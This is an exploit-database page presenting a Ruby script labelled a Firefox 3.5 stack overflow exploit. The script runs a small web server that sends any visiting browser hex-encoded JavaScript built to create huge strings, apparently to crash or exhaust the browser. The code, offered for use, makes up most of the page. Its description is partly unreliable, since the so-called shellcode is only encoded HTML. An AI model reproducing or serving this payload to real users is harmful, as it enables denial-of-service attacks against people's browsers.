[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Firefox 3.5 Stack Overflow Exploit

Author
Whivack Gsk
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11538
Category
local exploits
Date add
31-03-2010
Platform
windows
==================================
Firefox 3.5 Stack Overflow Exploit
==================================

#!bin/ruby

#########################################################
# Exploit : Shellcode Stack Overflow Firefox 3.5
# Date : 23/03/2010
# Author : Whivack Gsk?
# Software Link : http://www.mozilla-europe.org/fr/firefox/3.5/releasenotes/
# Version : 3.5
# Tested On : XP/Vista & Ubuntu
# Fonction : Connect Firefox Browser http://127.0.0.1:81/
##########################################################

require 'socket'

shellcode =
"\x3C\x68\x74\x6D\x6C\x3E" +
"\x3C\x68\x65\x61\x64\x3E" +
"\x3C\x73\x63\x72\x69\x70\x74\x3E" +
"\x76\x61\x72\x20\x73\x20\x3D\x20\x75\x6E\x65\x73\x63\x61\x70\x65\x28\x22\x25\x75\x34\x31\x34\x31\x25\x75\x34\x31\x34\x31\x22\x29\x3B\x20" +
"\x76\x61\x72\x20\x73\x74\x20\x3D\x20\x75\x6E\x65\x73\x63\x61\x70\x65\x28\x22\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x30\x22\x29\x3B\x20" +
"\x76\x61\x72\x20\x66\x32\x20\x3D\x20\x6D\x75\x6C\x38\x28\x73\x74\x2C\x20\x34\x39\x30\x30\x30\x30\x30\x30\x29\x3B\x20" +
"\x76\x61\x72\x20\x66\x20\x3D\x20\x6D\x75\x6C\x38\x28\x73\x2C\x20\x32\x31\x30\x30\x30\x30\x30\x30\x29\x3B\x20" +
"\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x28\x66\x32\x29\x3B\x20" +
"\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x28\x66\x29\x3B\x20" +
"\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x6D\x75\x6C\x38\x28\x73\x2C\x20\x6E\x75\x6D\x29\x20\x7B\x20" +
"\x76\x61\x72\x20\x69\x20\x3D\x20\x4D\x61\x74\x68\x2E\x63\x65\x69\x6C\x28\x4D\x61\x74\x68\x2E\x6C\x6F\x67\x28\x6E\x75\x6D\x29\x20\x2F\x20\x4D\x61\x74\x68\x2E\x4C\x4E\x32\x29\x2C\x20" +
"\x72\x65\x73\x20\x3D\x20\x73\x3B" +
"\x64\x6F\x20\x7B" +
"\x72\x65\x73\x20\x2B\x3D\x72\x65\x73\x3B" +
"\x7D\x20\x77\x68\x69\x6C\x65\x20\x28\x30\x20\x3C\x20\x2D\x2D\x69\x29\x3B" +
"\x72\x65\x74\x75\x72\x6E\x20\x72\x65\x73\x2E\x73\x6C\x69\x63\x65\x28\x30\x2C\x20\x73\x2E\x6C\x65\x6E\x67\x74\x68\x20\x2A\x6E\x75\x6D\x29\x3B" +
"\x7D" +
"\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E" +
"\x3C\x2F\x68\x65\x61\x64\x3E" +
"\x3C\x62\x6F\x64\x79\x3E" +
"\x3C\x2F\x62\x6F\x64\x79\x3E" +
"\x3C\x2F\x68\x74\x6D\x6C\x3E" +
"\x3C\x68\x74\x6D\x6C\x3E" +
"\x3C\x62\x6F\x64\x79\x3E" +
"\x3C\x2F\x62\x6F\x64\x79\x3E" +
"\x3C\x2F\x68\x74\x6D\x6C\x3E"

serveur = TCPServer.new( 81 )
client = nil
while ( ( client = serveur.accept ) )
requete = client.gets
client.puts( "HTTP/1.0 200 OK" )
client.puts( "Content-Type:text/html" )
client.puts
client.puts "#{shellcode}"

client.close
end



#  0day.today [2024-12-26]  #